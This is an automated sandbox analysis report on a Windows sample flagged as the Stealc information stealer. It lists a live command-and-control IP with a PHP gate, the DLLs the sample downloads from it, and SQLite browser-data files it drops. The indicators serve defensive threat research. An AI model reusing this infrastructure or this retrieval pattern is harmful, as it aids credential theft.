https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true		unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpdowsApps	file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	FCAECAKKFBGCBGDGIEHC.0.dr	false		unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpxO	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll)	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpge	file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phps	file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.2280662984.000000000050B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpMSnh	file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpdll	file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllgZ#i	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37b	file.exe, 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2307918944.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294749141.000000001D926000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.php4Nhh	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll;	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php8Nth	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpwser	file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2300421049.0000000029A06000.00000004.00000020.00020000.00000000.sdmp, FCAECAKKFBGCBGDGIEHC.0.dr	false		unknown
https://support.mozilla.org	HIDHIEGIIIECAKEBFBAAEBKFCF.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2137174942.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, GHDBKJKJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpseVSCho	file.exe, 00000000.00000002.2281603796.0000000001417000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll?Z	file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dlli	file.exe, 00000000.00000002.2281603796.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525214
Start date and time:	2024-10-03 21:35:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	Setup.exe	Get hash	malicious	RedLine	Browse	185.215.113.22
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEBKFIJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFCFCAAAAFBAKEBFBAKKFCBGDH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FCAECAKKFBGCBGDGIEHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\GCGDGHCBGDHJJKECAECBAEGCBG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHDBKJKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHDBKJKJKKJDGDGDGIDGIIDAAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDHIEGIIIECAKEBFBAAEBKFCF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJKJJDHCGCAECAAECFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFBFCAFCBKFIEBFHIDBA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
